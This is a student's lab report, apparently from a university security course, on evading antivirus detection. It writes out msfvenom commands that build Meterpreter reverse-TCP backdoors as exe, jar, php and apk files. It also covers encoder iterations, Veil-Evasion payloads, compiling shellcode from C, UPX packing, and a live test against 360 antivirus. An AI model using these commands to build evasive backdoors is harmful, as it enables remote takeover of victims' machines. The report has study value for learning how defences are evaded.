2019-2020-2 20174303刘金晖 Exp3 免杀原理与实践

一、实践内容

任务一:

1.正确使用msf编码器

• 关于网站VirSCAN和Virus Total

　　是非盈利性的免费为广大网友服务的网站，它通过多种不同厂家提供的最新版本的病毒检测引擎对所上传的可疑文件进行在线扫描，并可以立刻将检测结果显示出来。我主要用了virus total。

• 对实验二生成的exe文件进行检测：

　　

•  在kali中输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 LHOST=192.168.203.130 LPORT=5225 -f exe > 20174303test.exe 指令，生成exe文件。
  •  -p 后面参数分别是：平台/软件/连接方式
  •  -e 后面参数是：编码器类型
  •  -b  后面参数是：减去16进制的0
  •  -f  后面参数是：输出后门的格式（文件类型）
  •  -i  后面参数是：编码的迭代次数

　　

 　　

• 在kali中输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.203.130 LPORT=5225 -f exe > 20174303_10.exe 指令，十次编码。

　　

　　

 

 2.msfvenom生成如jar之类的其他文件

• 在kali在输入msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.203.130 lport=5225 x> 20174303_back.jar 指令，生成jar文件。

　　

•  在kali中输入msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.203.130 lport=5225 x> 20174303_backdoor.php 指令，生成php文件。

　　

• 在kali中输入msfvenom -p android/meterpreter/reverse_tcp lhost192.168.203.130lport=5225 x> 20174303_backdoor.apk 指令，生成apk文件。

　　

 3.veil

• 安装veil，这又是一部血泪史，装了很长时间，遇到了很多很多问题，在我各种想方设法解决的时候，我发现不知道哪一步把我虚拟机搞坏了，太难了，于是我又重装了一次虚拟机，最后是这样成功的：
• 首先输入

  mkdir -p ~/.cache/wine
  cd ~/.cache/wine 
  wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
  wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

  这一步可能会需要很长时间，但是用流量会快很多。

• 输入 sudo apt-get install veil-evasion 命令安装veil。
• 输入 veil 打开veil,直到安装完成，这里也需要挺长时间。最后安装成功的界面是这样的：

　　

• 输入 use evasion ，进入Evil-Evasion

　　 

• 输入use c/meterpreter/rev_tcp.py 指令，进入配置界面。
• 输入set LHOST 192.168.203.131 指令，设置反弹连接IP。
• 输入set LPORT 4303 指令，设置端口。

　　

• 输入generate生成文件，输入文件名4303

　　

•  检测一下：

　　

 4.使用C + shellcode编程

• 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.131 LPORT=4303 -f c 指令，用c语言生成一段shellcode。

　　

•  创建一个c文件，然后编辑c文件。

　　

•  输入i686-w64-mingw32-g++ 4303.c -o 4303.exe 指令，将c文件转为exe文件。

　　

•  检测生成的文件。

　　

5.加壳

• 输入 upx 4303.exe -o 4303_upxed.exe 指令，为之前的4303.exe文件加壳。

　　

•  检测以下这个加壳后的文件

　　

•  在windows尝试运行以下，emmm,失败了

　　

 　　

 　　被拦截了n次，到windows就不行了。

6.使用其他方法

　　用Veil-Evasion的其他荷载生成后门方式。

• 启动veil，进入evasion，输入list查看可用的有效荷载，如下

　　

•  输入use 30选择第30个

　　

•  配置反弹连接的IP地址和端口号。

　　

•  输入generate 生成文件

　　

•  选择2

　　

• 检测生成的文件：

　　

 任务2：通过组合应用各种技术实现恶意代码免杀

• 将上面Veil-Evasion另一种载荷生成的文件
• 对文件加壳。
• 检测以下加壳后文件

　　

 　　还是有问题的。

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

• 用的是家里很久不用的，比较老旧的一台电脑windows 10
• 杀软是360 卫士12.0.0.2002

　　

 

标签：4303,文件,exe,免杀,Exp3,20174303,指令,输入,wine
来源： https://www.cnblogs.com/4303ljh/p/12614544.html